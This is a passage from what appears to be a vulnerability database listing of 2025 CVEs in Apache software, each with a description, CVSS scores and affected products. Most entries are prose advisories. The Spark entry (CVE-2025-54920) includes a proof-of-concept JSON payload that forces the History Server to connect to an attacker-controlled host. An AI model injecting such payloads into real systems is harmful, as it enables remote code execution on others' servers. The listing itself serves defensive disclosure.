Vendor Product Version
apache apache-airflow-providers-snowflake *
CVE-2025-52434

Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Tomcat when using the APR/Native connector. This was particularly noticeable with client initiated closes of HTTP/2 connections. This issue affects Apache Tomcat: from 9.0.0.M1 through 9.0.106. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 9.0.107, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-52435

J2EE Misconfiguration: Data Transmission Without Encryption vulnerability in Apache NimBLE. Improper handling of Pause Encryption procedure on Link Layer results in a previously encrypted connection being left in un-encrypted state allowing an eavesdropper to observe the remainder of the exchange. This issue affects Apache NimBLE: through <= 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache nimble *
CVE-2025-52520

For some unlikely configurations of multipart upload, an Integer Overflow vulnerability in Apache Tomcat could lead to a DoS via bypassing of size limits. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.8, from 10.1.0-M1 through 10.1.42, from 9.0.0.M1 through 9.0.106. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.9, 10.1.43 or 9.0.107, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-53020

Late Release of Memory after Effective Lifetime vulnerability in Apache HTTP Server. This issue affects Apache HTTP Server: from 2.4.17 up to 2.4.63. Users are recommended to upgrade to version 2.4.64, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-53192

** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Expression/Command Delimiters vulnerability in Apache Commons OGNL. This issue affects Apache Commons OGNL: all versions. When using the API Ognl.getValue​, the OGNL engine parses and evaluates the provided expression with powerful capabilities, including accessing and invoking related methods, etc. Although OgnlRuntime attempts to restrict certain dangerous classes and methods (such as java.lang.Runtime) through a blocklist, these restrictions are not comprehensive. Attackers may be able to bypass the restrictions by leveraging class objects that are not covered by the blocklist and potentially achieve arbitrary code execution. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache commons_ognl *
CVE-2025-53470

Out-of-bounds Read vulnerability in Apache NimBLE HCI H4 driver. Specially crafted HCI event could lead to invalid memory read in H4 driver. This issue affects Apache NimBLE: through 1.8.  This issue requires a broken or bogus Bluetooth controller and thus severity is considered low. Users are recommended to upgrade to version 1.9, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 3.1 LOW CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N 1.6 1.4

Products Affected

Vendor Product Version
apache nimble *
CVE-2025-53477

NULL Pointer Dereference vulnerability in Apache Nimble. Missing validation of HCI connection complete or HCI command TX buffer could lead to NULL pointer dereference. This issue requires disabled asserts and broken or bogus Bluetooth controller and thus severity is considered low. This issue affects Apache NimBLE: through 1.8.0. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache nimble *
CVE-2025-53506

Uncontrolled Resource Consumption vulnerability in Apache Tomcat if an HTTP/2 client did not acknowledge the initial settings frame that reduces the maximum permitted concurrent streams. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.8, from 10.1.0-M1 through 10.1.42, from 9.0.0.M1 through 9.0.106. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.0 through 8.5.100. Other EOL versions may also be affected. Users are recommended to upgrade to version 11.0.9, 10.1.43 or 9.0.107, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-53606

Deserialization of Untrusted Data vulnerability in Apache Seata (incubating). This issue affects Apache Seata (incubating): 2.4.0. Users are recommended to upgrade to version 2.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache seata 2.4.0
CVE-2025-53689

Blind XXE Vulnerabilities in jackrabbit-spi-commons and jackrabbit-core in Apache Jackrabbit < 2.23.2 due to usage of an unsecured document build to load privileges. Users are recommended to upgrade to versions 2.20.17 (Java 8), 2.22.1 (Java 11) or 2.23.2 (Java 11, beta versions), which fix this issue. Earlier versions (up to 2.20.16) are not supported anymore, thus users should update to the respective supported version.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache jackrabbit 2.22.0
apache jackrabbit *
apache jackrabbit 2.23.0
apache jackrabbit 2.23.1
CVE-2025-53960

When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache streampark *
CVE-2025-54057

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Apache SkyWalking. This issue affects Apache SkyWalking: <= 10.2.0. Users are recommended to upgrade to version 10.3.0, which fixes the issue.

Products Affected

Vendor Product Version
apache skywalking *
CVE-2025-54090

A bug in Apache HTTP Server 2.4.64 results in all "RewriteCond expr ..." tests evaluating as "true". Users are recommended to upgrade to version 2.4.65, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 2.8 3.4

Products Affected

Vendor Product Version
apache http_server 2.4.64
CVE-2025-54466

Improper Control of Generation of Code ('Code Injection') vulnerability leading to a possible RCE in Apache OFBiz scrum plugin. This issue affects Apache OFBiz: before 24.09.02 only when the scrum plugin is used. Even unauthenticated attackers can exploit this vulnerability. Users are recommended to upgrade to version 24.09.02, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 2.8 3.4
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2025-54472

Unlimited memory allocation in redis protocol parser in Apache bRPC (all versions < 1.14.1) on all platforms allows attackers to crash the service via network. Root Cause: In the bRPC Redis protocol parser code, memory for arrays or strings of corresponding sizes is allocated based on the integers read from the network. If the integer read from the network is too large, it may cause a bad alloc error and lead to the program crashing. Attackers can exploit this feature by sending special data packets to the bRPC service to carry out a denial-of-service attack on it. The bRPC 1.14.0 version tried to fix this issue by limited the memory allocation size, however, the limitation checking code is not well implemented that may cause integer overflow and evade such limitation. So the 1.14.0 version is also vulnerable, although the integer range that affect version 1.14.0 is different from that affect version < 1.14.0. Affected scenarios: Using bRPC as a Redis server to provide network services to untrusted clients, or using bRPC as a Redis client to call untrusted Redis services. How to Fix: we provide two methods, you can choose one of them: 1. Upgrade bRPC to version 1.14.1. 2. Apply this patch ( https://github.com/apache/brpc/pull/3050 ) manually. No matter you choose which method, you should note that the patch limits the maximum length of memory allocated for each time in the bRPC Redis parser. The default limit is 64M. If some of you redis request or response have a size larger than 64M, you might encounter error after upgrade. For such case, you can modify the gflag redis_max_allocation_size to set a larger limit.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache brpc *
CVE-2025-54539

A Deserialization of Untrusted Data vulnerability exists in the Apache ActiveMQ NMS AMQP Client. This issue affects all versions of Apache ActiveMQ NMS AMQP up to and including 2.3.0, when establishing connections to untrusted AMQP servers. Malicious servers could exploit unbounded deserialization logic present in the client to craft responses that may lead to arbitrary code execution on the client side. Although version 2.1.0 introduced a mechanism to restrict deserialization via allow/deny lists, the protection was found to be bypassable under certain conditions. In line with Microsoft’s deprecation of binary serialization in .NET 9, the project is evaluating the removal of .NET binary serialization support from the NMS API entirely in future releases. Mitigation and Recommendations: Users are strongly encouraged to upgrade to version 2.4.0 or later, which resolves the issue. Additionally, projects depending on NMS-AMQP should migrate away from .NET binary serialization as part of a long-term hardening strategy.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache activemq_nms_amqp *
CVE-2025-54656

** UNSUPPORTED WHEN ASSIGNED ** Improper Output Neutralization for Logs vulnerability in Apache Struts. This issue affects Apache Struts Extras: before 2. When using LookupDispatchAction, in some cases, Struts may print untrusted input to the logs without any filtering. Specially-crafted input may lead to log output where part of the message masquerades as a separate log line, confusing consumers of the logs (either human or automated).  As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache struts_extras *
CVE-2025-54812

Improper Output Neutralization for Logs vulnerability in Apache Log4cxx. When using HTMLLayout, logger names are not properly escaped when writing out to the HTML file. If untrusted data is used to retrieve the name of a logger, an attacker could theoretically inject HTML or Javascript in order to hide information from logs or steal data from the user. In order to activate this, the following sequence must occur: * Log4cxx is configured to use HTMLLayout. * Logger name comes from an untrusted string * Logger with compromised name logs a message * User opens the generated HTML log file in their browser, leading to potential XSS Because logger names are generally constant strings, we assess the impact to users as LOW This issue affects Apache Log4cxx: before 1.5.0. Users are recommended to upgrade to version 1.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache log4cxx *
CVE-2025-54813

Improper Output Neutralization for Logs vulnerability in Apache Log4cxx. When using JSONLayout, not all payload bytes are properly escaped. If an attacker-supplied message contains certain non-printable characters, these will be passed along in the message and written out as part of the JSON message. This may prevent applications that consume these logs from correctly interpreting the information within them. This issue affects Apache Log4cxx: before 1.5.0. Users are recommended to upgrade to version 1.5.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache log4cxx *
CVE-2025-54831

Apache Airflow 3 introduced a change to the handling of sensitive information in Connections. The intent was to restrict access to sensitive connection fields to Connection Editing Users, effectively applying a "write-only" model for sensitive values. In Airflow 3.0.3, this model was unintentionally violated: sensitive connection information could be viewed by users with READ permissions through both the API and the UI. This behavior also bypassed the `AIRFLOW__CORE__HIDE_SENSITIVE_VAR_CONN_FIELDS` configuration option. This issue does not affect Airflow 2.x, where exposing sensitive information to connection editors was the intended and documented behavior. Users of Airflow 3.0.3 are advised to upgrade Airflow to >=3.0.4.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow 3.0.3
CVE-2025-54920

This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache spark 4.0.1
apache spark 4.0.0
apache spark *
CVE-2025-54941

An example dag `example_dag_decorator` had non-validated parameter that allowed the UI user to redirect the example to a malicious server and execute code on worker. This however required that the example dags are enabled in production (not default) or the example dag code copied to build your own similar dag. If you used the `example_dag_decorator` please review it and apply the changes implemented in Airflow 3.0.5 accordingly.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.6 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 2.1 2.5

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-54947

In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access. This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache streampark *
CVE-2025-54981

Weak Encryption Algorithm in StreamPark, The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data This issue affects Apache StreamPark: from 2.0.0 before 2.1.7. Users are recommended to upgrade to version 2.1.7, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache streampark *
CVE-2025-54988

Critical XXE in Apache Tika (tika-parser-pdf-module) in Apache Tika 1.13 through and including 3.2.1 on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. An attacker may be able to read sensitive data or trigger malicious requests to internal resources or third-party servers. Note that the tika-parser-pdf-module is used as a dependency in several Tika packages including at least: tika-parsers-standard-modules, tika-parsers-standard-package, tika-app, tika-grpc and tika-server-standard. Users are recommended to upgrade to version 3.2.2, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.4 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 2.5 5.9
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache tika *
CVE-2025-55039

This issue affects Apache Spark versions before 3.4.4, 3.5.2 and 4.0.0. Apache Spark versions before 4.0.0, 3.5.2 and 3.4.4 use an insecure default network encryption cipher for RPC communication between nodes. When spark.network.crypto.enabled is set to true (it is set to false by default), but spark.network.crypto.cipher is not explicitly configured, Spark defaults to AES in CTR mode (AES/CTR/NoPadding), which provides encryption without authentication. This vulnerability allows a man-in-the-middle attacker to modify encrypted RPC traffic undetected by flipping bits in ciphertext, potentially compromising heartbeat messages or application data and affecting the integrity of Spark workflows. To mitigate this issue, users should either configure spark.network.crypto.cipher to AES/GCM/NoPadding to enable authenticated encryption or enable SSL encryption by setting spark.ssl.enabled to true, which provides stronger transport security.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache spark *
CVE-2025-55668

Session Fixation vulnerability in Apache Tomcat via rewrite valve. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.7, from 10.1.0-M1 through 10.1.41, from 9.0.0.M1 through 9.0.105. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.8, 10.1.42 or 9.0.106, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2025-55672

A stored Cross-Site Scripting (XSS) vulnerability exists in Apache Superset's chart visualization. An authenticated user with permissions to edit charts can inject a malicious payload into a column's label. The payload is not properly sanitized and gets executed in the victim's browser when they hover over the chart, potentially leading to session hijacking or the execution of arbitrary commands on behalf of the user. This issue affects Apache Superset: before 5.0.0. Users are recommended to upgrade to version 5.0.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

Products Affected

Vendor Product Version
apache superset *
CVE-2025-55673

When a guest user accesses a chart in Apache Superset, the API response from the /chart/data endpoint includes a query field in its payload. This field contains the underlying query, which improperly discloses database schema information, such as table names, to the low-privileged guest user. This issue affects Apache Superset: before 4.1.3. Users are recommended to upgrade to version 4.1.3, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2025-55674

A bypass of the DISALLOWED_SQL_FUNCTIONS security feature in Apache Superset allows for the execution of blocked SQL functions. An attacker can use a special inline block to circumvent the denylist. This allows a user with SQL Lab access to execute functions that were intended to be disabled, leading to the disclosure of sensitive database information like the software version. This issue affects Apache Superset: before 5.0.0. Users are recommended to upgrade to version 5.0.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2025-55675

Apache Superset contains an improper access control vulnerability in its /explore endpoint. A missing authorization check allows an authenticated user to discover metadata about datasources they do not have permission to access. By iterating through the datasource_id in the URL, an attacker can enumerate and confirm the existence and names of protected datasources, leading to sensitive information disclosure. This issue affects Apache Superset: before 5.0.0. Users are recommended to upgrade to version 5.0.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2025-55752

Relative Path Traversal vulnerability in Apache Tomcat. The fix for bug 60013 introduced a regression where the rewritten URL was normalized before it was decoded. This introduced the possibility that, for rewrite rules that rewrite query parameters to the URL, an attacker could manipulate the request URI to bypass security constraints including the protection for /WEB-INF/ and /META-INF/. If PUT requests were also enabled then malicious files could be uploaded leading to remote code execution. PUT requests are normally limited to trusted users and it is considered unlikely that PUT requests would be enabled in conjunction with a rewrite that manipulated the URI. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.0.M11 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.6 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2025-55753

An integer overflow in the case of failed ACME certificate renewal leads, after a number of failures (~30 days in default configurations), to the backoff timer becoming 0. Attempts to renew the certificate then are repeated without delays until it succeeds. This issue affects Apache HTTP Server: from 2.4.30 before 2.4.66. Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-55754

Improper Neutralization of Escape, Meta, or Control Sequences vulnerability in Apache Tomcat. Tomcat did not escape ANSI escape sequences in log messages. If Tomcat was running in a console on a Windows operating system, and the console supported ANSI escape sequences, it was possible for an attacker to use a specially crafted URL to inject ANSI escape sequences to manipulate the console and the clipboard and attempt to trick an administrator into running an attacker controlled command. While no attack vector was found, it may have been possible to mount this attack on other operating systems. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.10, from 10.1.0-M1 through 10.1.44, from 9.0.40 through 9.0.108. The following versions were EOL at the time the CVE was created but are known to be affected: 8.5.60 though 8.5.100. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.11 or later, 10.1.45 or later or 9.0.109 or later, which fix the issue.

Products Affected

Vendor Product Version
apache tomcat *
CVE-2025-57738

Apache Syncope offers the ability to extend / customize the base behavior on every deployment by allowing to provide custom implementations of a few Java interfaces; such implementations can be provided either as Java or Groovy classes, with the latter being particularly attractive as the machinery is set for runtime reload. Such a feature has been available for a while, but recently it was discovered that a malicious administrator can inject Groovy code that can be executed remotely by a running Apache Syncope Core instance. Users are recommended to upgrade to version 3.0.14 / 4.0.2, which fix this issue by forcing the Groovy code to run in a sandbox.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.2 HIGH CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 1.2 5.9

Products Affected

Vendor Product Version
apache syncope *
CVE-2025-58098

Apache HTTP Server 2.4.65 and earlier with Server Side Includes (SSI) enabled and mod_cgid (but not mod_cgi) passes the shell-escaped query string to #exec cmd="..." directives. This issue affects Apache HTTP Server before 2.4.66. Users are recommended to upgrade to version 2.4.66, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.3 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L 2.8 5.5

Products Affected

Vendor Product Version
apache http_server *
CVE-2025-58130

Insufficiently Protected Credentials vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.11.0. The issue is fixed in version 1.12.1. Users are encouraged to upgrade to version 1.13.0, the latest release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache fineract *
CVE-2025-58137

Authorization Bypass Through User-Controlled Key vulnerability in Apache Fineract. This issue affects Apache Fineract: through 1.11.0. The issue is fixed in version 1.12.1. Users are encouraged to upgrade to version 1.13.0, the latest release.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache fineract *
CVE-2025-58337

An attacker with a valid read-only account can bypass Doris MCP Server’s read-only mode due to improper access control, allowing modifications that should have been prevented by read-only restrictions. Impact: Bypasses read-only mode; attackers with read-only access may perform unauthorized modifications. Recommended action for operators: Upgrade to version 0.6.0 as soon as possible (this release contains the fix).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache doris_mcp_server *
CVE-2025-58457

Improper permission check in ZooKeeper AdminServer lets authorized clients to run snapshot and restore command with insufficient permissions. This issue affects Apache ZooKeeper: from 3.9.0 before 3.9.4. Users are recommended to upgrade to version 3.9.4, which fixes the issue. The issue can be mitigated by disabling both commands (via admin.snapshot.enabled and admin.restore.enabled), disabling the whole AdminServer interface (via admin.enableServer), or ensuring that the root ACL does not provide open permissions. (Note that ZooKeeper ACLs are not recursive, so this does not impact operations on child nodes besides notifications from recursive watches.)

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache zookeeper *
CVE-2025-58782

Deserialization of Untrusted Data vulnerability in Apache Jackrabbit Core and Apache Jackrabbit JCR Commons. This issue affects Apache Jackrabbit Core: from 1.0.0 through 2.22.1; Apache Jackrabbit JCR Commons: from 1.0.0 through 2.22.1. Deployments that accept JNDI URIs for JCR lookup from untrusted users allows them to inject malicious JNDI references, potentially leading to arbitrary code execution through deserialization of untrusted data. Users are recommended to upgrade to version 2.22.2. JCR lookup through JNDI has been disabled by default in 2.22.2. Users of this feature need to enable it explicitly and are adviced to review their use of JNDI URI for JCR lookup.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 3.9 2.5

Products Affected

Vendor Product Version
apache jackrabbit *
